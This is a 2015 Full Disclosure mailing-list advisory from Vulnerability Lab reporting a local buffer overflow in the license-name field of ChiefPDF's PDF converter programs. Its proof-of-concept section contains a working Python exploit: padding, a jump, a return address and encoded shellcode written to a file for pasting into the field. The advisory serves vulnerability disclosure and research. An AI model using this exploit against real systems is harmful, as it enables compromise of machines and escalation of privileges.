[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] ChiefPDF Software v2.x - Buffer Overflow Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2015-08-20 12:32:02
Message-ID: 55D5C8C2.7050100 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
ChiefPDF Software v2.x - Buffer Overflow Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1578
Release Date:
=============
2015-08-20
Vulnerability Laboratory ID (VL-ID):
====================================
1578
Common Vulnerability Scoring System:
====================================
7.3
Product & Service Introduction:
===============================
High Volume Batch OCR Conversion.
High Performance TIFF to PDF OCR.‎ High-Volume Tiff To PDF \
Conversions. Find Out How Easy it Can Be!‎ Convert scanned documents \
& images. Searchable PDF.
(Copy of the Vendor Homepage: http://www.chiefpdf.com & \
http://www.soft32.com/publishers/chiefpdf/)
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a local \
buffer overflow vulnerability in the official ChiefPDF Software Clients \
v2.0.
Vulnerability Disclosure Timeline:
==================================
2015-08-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
ChiefPDF Software
Product: PDF to Image Converter PDF to Image Converter Free, PDF to Tiff \
Converter & PDF 2.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local buffer overflow vulnerability has been discovered in the official \
ChiefPDF Software Clients v2.0. The buffer overflow vulnerability can be \
exploited by local attackers to compromise a target system or to gain \
higher access privileges for further exploitation.
The buffer overflow vulnerability is located in the `Registration - License \
Name` input field of the software client. The issue is a classic unicode \
buffer overflow vulnerability that allows an attacker to compromise the \
local system. The vulnerability can be exploited in all software clients \
like the PDF to Image Converter 2.0, PDF to Image Converter Free 2.0, PDF \
to Tiff Converter 2.0 and PDF to Tiff Converter Free 2.0.
The security risk of the buffer overflow vulnerability is estimated as high \
with a cvss (common vulnerability scoring system) count of 7.3. \
Exploitation of the vulnerability requires a low privilege system user \
account and no user interaction. Successful exploitation of the \
vulnerability results in system compromise by elevation of privileges via \
overwrite of the registers.
Vulnerable Module(s):
[+] Registration - License Name
Vulnerable Program(s):
[+] PDF to Image Converter 2.0
[+] PDF to Image Converter Free 2.0
[+] PDF to Tiff Converter 2.0
[+] PDF to Tiff Converter Free 2.0
Proof of Concept (PoC):
=======================
The local buffer overflow vulnerability can be exploited by local attackers \
with restricted system user account without user interaction. For security \
demonstration or to reproduce follow the provided information and steps \
below to continue.
PoC: ChiefPDF.py
#!/usr/bin/python
#Exploit Title:ChiefPDF Software Buffer Overflow
#vulnerable programs:
#PDF to Image Converter 2.0
#PDF to Image Converter Free 2.0
#PDF to Tiff Converter 2.0
#PDF to Tiff Converter Free 2.0
#Software Link:http://www.soft32.com/publishers/chiefpdf/
#Author: metacom - twitter.com/m3tac0m
#Tested on: Win-Xp-sp3, Win-7, Win-8.1
#How to use: Copy the AAAA...+ string from regkey.txt and paste -> \
Registration - License Name: (input) buffer="A" * 544
buffer+="\xeb\x06\x90\x90"
buffer+="\x8B\x89\x03\x10"# 1003898B 5E POP ESI
buffer+="\x90" * 80
buffer+=("\xba\x50\x3e\xf5\xa5\xda\xd7\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x33\x83\xc3\x04\x31\x53\x0e\x03\x03\x30\x17\x50\x5f\xa4\x5e"
"\x9b\x9f\x35\x01\x15\x7a\x04\x13\x41\x0f\x35\xa3\x01\x5d\xb6"
"\x48\x47\x75\x4d\x3c\x40\x7a\xe6\x8b\xb6\xb5\xf7\x3d\x77\x19"
"\x3b\x5f\x0b\x63\x68\xbf\x32\xac\x7d\xbe\x73\xd0\x8e\x92\x2c"
"\x9f\x3d\x03\x58\xdd\xfd\x22\x8e\x6a\xbd\x5c\xab\xac\x4a\xd7"
"\xb2\xfc\xe3\x6c\xfc\xe4\x88\x2b\xdd\x15\x5c\x28\x21\x5c\xe9"
"\x9b\xd1\x5f\x3b\xd2\x1a\x6e\x03\xb9\x24\x5f\x8e\xc3\x61\x67"
"\x71\xb6\x99\x94\x0c\xc1\x59\xe7\xca\x44\x7c\x4f\x98\xff\xa4"
"\x6e\x4d\x99\x2f\x7c\x3a\xed\x68\x60\xbd\x22\x03\x9c\x36\xc5"
"\xc4\x15\x0c\xe2\xc0\x7e\xd6\x8b\x51\xda\xb9\xb4\x82\x82\x66"
"\x11\xc8\x20\x72\x23\x93\x2e\x85\xa1\xa9\x17\x85\xb9\xb1\x37"
"\xee\x88\x3a\xd8\x69\x15\xe9\x9d\x86\x5f\xb0\xb7\x0e\x06\x20"
"\x8a\x52\xb9\x9e\xc8\x6a\x3a\x2b\xb0\x88\x22\x5e\xb5\xd5\xe4"
"\xb2\xc7\x46\x81\xb4\x74\x66\x80\xd6\x1b\xf4\x48\x37\xbe\x7c"
"\xea\x47")
file = open('regkey.txt','wb')
file.write(buffer);
file.close()
Security Risk:
==============
The security risk of the local buffer overflow vulnerability in the \
chiefpdf software clients is estimated as high. (CVSS 7.3)
Credits & Authors:
==================
metacom - [http://www.vulnerability-lab.com/show.php?user=metacom]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any \
warranty. Vulnerability Lab disclaims all warranties, either expressed or \
implied, including the warranties of merchantability and capability for a \
particular purpose. Vulnerability-Lab or its suppliers are not liable in \
any case of damage, including direct, indirect, incidental, consequential \
loss of business profits or special damages, even if Vulnerability-Lab or \
its suppliers have been advised of the possibility of such damages. Some \
states do not allow the exclusion or limitation of liability for \
consequential or incidental damages so the foregoing limitation may not \
apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen \
material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - \
www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com \
- admin@evolution-sec.com
Section: magazine.vulnerability-db.com - \
vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab \
- youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - \
vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - \
vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file \
requires authorization from Vulnerability Laboratory. Permission to \
electronically redistribute this alert in its unmodified form is granted. \
All other rights, including the use of other media, are reserved by \
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is \
trademark of vulnerability-lab team & the specific authors or managers. To \
record, list (feed), modify, use or edit our material contact \
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a \
permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security \
GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic